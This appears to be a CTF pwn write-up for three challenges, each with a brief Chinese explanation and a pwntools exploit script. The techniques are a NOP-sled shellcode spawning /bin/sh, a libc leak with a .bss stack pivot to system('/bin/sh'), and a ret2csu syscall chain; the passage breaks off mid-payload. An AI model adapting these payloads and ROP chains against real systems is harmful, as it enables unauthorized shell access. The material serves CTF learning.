NKCTF PWN wp



ezshellcode

用 nop(0x90)填充出一段滑行区(nop sled):只要控制流落在填充区内的任意位置,就会一路滑到紧随其后的 shellcode,从而抵消栈地址的随机偏移。

#!/usr/bin/env python
#coding=utf-8
from pwn import *
from ctypes import CDLL
# Target is amd64 Linux; debug-level logging prints every byte on the tube.
context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./pwn')

# DEBUG = 1 -> run ./pwn locally (debug() may attach gdb);
# DEBUG = 0 -> connect to the remote challenge instance.
DEBUG = 1
gdbOpen = 1 if DEBUG else 0
if DEBUG:
    # Host libc handle (not referenced later in this script).
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./pwn')
else:
    ip, port = 'node.yuzhian.com.cn', 38867
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    """Attach gdb to the running target when gdbOpen == 1.

    info: gdb command string executed on attach (default: break at main).
    Does nothing when gdbOpen != 1, so the same script runs unattended
    against the remote instance.
    """
    if gdbOpen != 1:
        return
    gdb.attach(p, info)
    # For PIE binaries use a rebased breakpoint: gdb.attach(p, "b *$rebase(0x...)")


# Break just before the buffer is used; only fires when gdbOpen == 1.
debug("b *0x00000000004012F1")

# NOP sled (104 x 0x90) followed by a /bin/sh shellcode: landing anywhere
# inside the sled slides execution into the shellcode.
nop_sled = b'\x90' * 104
shellcode = nop_sled + asm(shellcraft.sh())
p.sendafter("in 5 min!\n", shellcode)

p.interactive()

a_story_of_a_pwner

先通过菜单项 4 泄漏 libc 地址,把 /bin/sh 地址、pop rdi; ret 和 system 地址依次写进 bss 上的三个 comment 槽;然后溢出覆盖保存的 rbp 为该 bss 地址并返回到 leave; ret 完成栈迁移,迁移后的空间刚好够弹一个参数去调用 system。

#!/usr/bin/env python
#coding=utf-8
from pwn import *
from ctypes import CDLL
# Target is amd64 Linux; debug-level logging prints every byte on the tube.
context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./pwn')

# DEBUG = 1 -> run ./pwn locally (debug() may attach gdb);
# DEBUG = 0 -> connect to the remote challenge instance.
DEBUG = 0
gdbOpen = 1 if DEBUG else 0
# Challenge libc, used for system/"/bin/sh" offsets in both modes.
libc = ELF("./libc.so.6")
if DEBUG:
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./pwn')
else:
    ip, port = 'node2.yuzhian.com.cn', 33627
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    """Attach gdb to the running target when gdbOpen == 1.

    info: gdb command string executed on attach (default: break at main).
    Does nothing when gdbOpen != 1, so the same script runs unattended
    against the remote instance.
    """
    if gdbOpen != 1:
        return
    gdb.attach(p, info)
    # For PIE binaries use a rebased breakpoint: gdb.attach(p, "b *$rebase(0x...)")


def choose(choice):
    """Select a menu entry: wait for the "> " prompt, then send choice as an ASCII line."""
    selection = str(choice).encode('ascii')
    p.sendlineafter(b"> \n", selection)

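pop_rdi = 0x0000000000401573    # pop rdi ; ret
leave_ret = 0x000000000040139E  # leave ; ret  -- reused as the stack-pivot gadget
# Distance from the address the program prints (menu 4) to the libc base.
# Tied to the supplied ./libc.so.6; re-derive it from libc.sym if the libc changes.
LEAK_TO_BASE = 0x84420
# Value written over the saved rbp; after the second `leave` rsp = this + 8.
# Assumed to sit next to the three comment slots in .bss -- TODO confirm in gdb.
PIVOT_ADDR = 0x0000000000405098

debug("b *0x000000000040139F")

# 1. Leak: menu 4 prints a libc address as "0x" + 12 hex digits.
#    recvn() blocks until all 12 digits have arrived; recv(12) returns *up to*
#    12 bytes, so a short read over the network would yield a wrong base.
choose(4)
p.recvuntil(b'0x')
libc_base = int(p.recvn(12), 16) - LEAK_TO_BASE
log.info("libc_base==>0x%x" % libc_base)
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

# 2. Stage the chain in .bss through the three comment slots (1, 2, 3).
#    The slot order must match what the pivoted stack expects: the second
#    `leave` pops the first 8 bytes into rbp, the following `ret` takes the
#    next 8 as rip. Verify the slot addresses against PIVOT_ADDR in gdb.
choose(1)
p.sendafter(b'comment?\n', p64(binsh_addr))
choose(2)
p.sendafter(b'corment?\n', p64(pop_rdi))
choose(3)
p.sendafter(b'corMenT?\n', p64(system_addr))

# 3. Overflow: 0xa bytes of filler, saved rbp -> PIVOT_ADDR, return -> leave;ret.
#    The function's own leave loads rbp = PIVOT_ADDR; leave_ret then moves
#    rsp there and returns into the staged chain.
choose(4)
payload = b'a' * 0xa + p64(PIVOT_ADDR) + p64(leave_ret)
p.sendafter(b'heart...\n', payload)

p.interactive()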

ez_stack

程序内直接就能找到 syscall 的 gadget,无需泄漏 libc;需要注意的是 __libc_csu_init 的 call 是间接调用(call [reg+rbx*8]),取的是一个函数指针,所以要先把 syscall gadget 的地址写到 bss 上,再把这个 bss 地址交给 csu 去解引用,才能正常调用。

#!/usr/bin/env python
#coding=utf-8
from pwn import *
from ctypes import CDLL
# Target is amd64 Linux; debug-level logging prints every byte on the tube.
context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./ez_stack')

# DEBUG = 1 -> run locally under the challenge glibc (debug() may attach gdb);
# DEBUG = 0 -> connect to the remote challenge instance.
DEBUG = 0
gdbOpen = 1 if DEBUG else 0
if DEBUG:
    # Run with glibc 2.23 from glibc-all-in-one instead of the host libc:
    # launch the matching ld.so directly and LD_PRELOAD its libc.
    # These paths are machine-specific; point them at the local checkout.
    libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
    ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so")
    p = process(argv=[ld.path, elf.path], env={"LD_PRELOAD": libc.path})
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
else:
    ip, port = 'node2.yuzhian.com.cn', 35211
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    """Attach gdb to the running target when gdbOpen == 1.

    info: gdb command string executed on attach (default: break at main).
    Does nothing when gdbOpen != 1, so the same script runs unattended
    against the remote instance.
    """
    if gdbOpen != 1:
        return
    gdb.attach(p, info)
    # For PIE binaries use a rebased breakpoint: gdb.attach(p, "b *$rebase(0x...)")

# Gadgets inside ./ez_stack (fixed addresses, non-PIE). The pop rsi/pop rdi
# gadgets are mis-aligned reads of the __libc_csu_init register-pop tail.
pop_rdi = 0x401283   # pop rdi ; ret
pop_rsi = 0x401281   # pop rsi ; pop r15 ; ret
syscall = 0x40114e   # syscall gadget inside the binary itself, no libc leak needed
csu1 = 0x40127A      # ret2csu part 1: pop rbx/rbp/r12..r15 ; ret   -- TODO confirm in disassembly
csu2 = 0x401260      # ret2csu part 2: load arg regs, then call through a pointer
                     # (call [reg + rbx*8]), so the target must be stored in memory (.bss)

# Break before the vulnerable read; only fires when gdbOpen == 1.
debug("b *0x00000000004011F6")
payload = b'a'*0x18 &#